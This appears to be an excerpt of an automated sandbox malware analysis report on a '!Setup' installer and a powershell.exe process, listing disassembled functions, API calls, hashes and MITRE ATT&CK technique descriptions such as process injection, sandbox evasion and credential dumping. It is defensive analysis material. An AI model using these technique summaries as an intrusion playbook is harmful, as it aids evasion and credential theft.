Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: powershell.exePID: 1852, Parent PID: 7800COMMON

Executed Functions

Function 04003FA0 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2437305598.0000000004000000.00000040.00000800.00020000.00000000.sdmp, Offset: 04000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ddf9b6179f0caf2ae39f59a4e07c2a6f753b4dda964a39d68da0778a375e463
Instruction ID: 10092c26f6be551b664a0e9bf9b071fe75797faf5f246e5a45f0dde637796f3f
Opcode Fuzzy Hash: 0ddf9b6179f0caf2ae39f59a4e07c2a6f753b4dda964a39d68da0778a375e463
Instruction Fuzzy Hash: 5122BC70A042458FCB05CF5DC8949AABBB1FF49310B2585AAE545EB3A6C735FC81CBA4

Function 04003010 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2437305598.0000000004000000.00000040.00000800.00020000.00000000.sdmp, Offset: 04000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0207dbb7778321320b91f2c66f4022a53c45ee565d2ea3f2c7529adee965c4f
Instruction ID: e299419f2e3a09a849e71bf5cf8aa59f3c656e2f7a915d6d5b3e42afed8c7078
Opcode Fuzzy Hash: c0207dbb7778321320b91f2c66f4022a53c45ee565d2ea3f2c7529adee965c4f
Instruction Fuzzy Hash: 5B219DB4A0120A8FCB01CF5CD8959AEFBB4FF49310B14859AE815EB392D735ED41CBA1

Function 04003000 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2437305598.0000000004000000.00000040.00000800.00020000.00000000.sdmp, Offset: 04000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 529ae452a922da1e702f8fa79fc6000a5640d4c82d3dc8068ec69cd7aa934932
Instruction ID: 31be1ca170a7a8f793f5320a21ddd27ef962101d40a687b0695b0b9063390331
Opcode Fuzzy Hash: 529ae452a922da1e702f8fa79fc6000a5640d4c82d3dc8068ec69cd7aa934932
Instruction Fuzzy Hash: D7211774A012098FCB01CF9CD4909AEBBF5FF89310B15859AE809AB356C735FD41CBA1

Function 0071D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2437014690.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_71d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87edb885e6a4b9a0ac1229b2400995f1506cf42187ef0f18afdb52774d6738ce
Instruction ID: e938f5012ffdc5f9a10f1b810d1d65d1dba6a77c1a65712e24db9f76828e79f6
Opcode Fuzzy Hash: 87edb885e6a4b9a0ac1229b2400995f1506cf42187ef0f18afdb52774d6738ce
Instruction Fuzzy Hash: 2301A7715093449AE7204A2DC9847A7BFD8EF49324F18C529ED484A1C6C67D9CC1CEB1

Function 06F5164E Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2439802962.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dc35346e8d9dc81ea19c22b75d5d16db0e9ca500dfdecb54af3195405855eff
Instruction ID: e1506c661e7dd74dce1eb281f2e9917656637a6447a57eff0834a45a2d5eb21d
Opcode Fuzzy Hash: 7dc35346e8d9dc81ea19c22b75d5d16db0e9ca500dfdecb54af3195405855eff
Instruction Fuzzy Hash: 91F04072E043505FCB769578994229A7BA19B872A071B06AACE426F712C421AC03C7E1

Function 0071D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2437014690.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_71d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9111b0c6c147197afebd5ac1e594e9f502bdf1be6a816e354a8962d96ba72d4a
Instruction ID: 6691ae47cd805a47ffc48a93b520d1a56881fc07cbba31ec25ca59c5c39b4d85
Opcode Fuzzy Hash: 9111b0c6c147197afebd5ac1e594e9f502bdf1be6a816e354a8962d96ba72d4a
Instruction Fuzzy Hash: 9AF06272405344AEE7208A1AC9C4BA2FFA8EB55734F18C55AED484E286C2799C85CAB1

Non-executed Functions

Function 06F50148 Relevance: 9.1, Strings: 7, Instructions: 326COMMON

Download Yara Rule

Strings

tPkq, xrefs: 06F50395
$kq, xrefs: 06F5032A
$kq, xrefs: 06F50350
4'kq, xrefs: 06F50257
$kq, xrefs: 06F5035C
4'kq, xrefs: 06F5024B
tPkq, xrefs: 06F503A1

Memory Dump Source

Source File: 00000011.00000002.2439802962.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq
API String ID: 0-801068408
Opcode ID: 8050d82976266c0f669092773eb173e59a1cfada203f1868c5493cdc8b6a0ff1
Instruction ID: c276696c2b19e11007bf30ab108b2e2cef8db61fb44cb48f9225ac97970c438d
Opcode Fuzzy Hash: 8050d82976266c0f669092773eb173e59a1cfada203f1868c5493cdc8b6a0ff1
Instruction Fuzzy Hash: 93A16732F043548FD7658A79981166BBBE6AFC2310B2A84BFDE45CB291DE35CC41C7A1

Function 06F52C10 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$kq, xrefs: 06F52C6C
$kq, xrefs: 06F52C22
$kq, xrefs: 06F52C78
$kq, xrefs: 06F52C3E

Memory Dump Source

Source File: 00000011.00000002.2439802962.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq
API String ID: 0-2881790790
Opcode ID: a8ad87835a43a5fb20a2c389e4e0c852b6bce62766a1141c480e36b8bdbbf35a
Instruction ID: d4bfa9ea4496b2b7298b71bc6d34ee4ca816d2acdf0f3130c6f5194f08b48da1
Opcode Fuzzy Hash: a8ad87835a43a5fb20a2c389e4e0c852b6bce62766a1141c480e36b8bdbbf35a
Instruction Fuzzy Hash: BD216B32F103455BEBB8956A8C48B23B6D65BC4325F35852AEE05CB382DF39CE40C3A1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
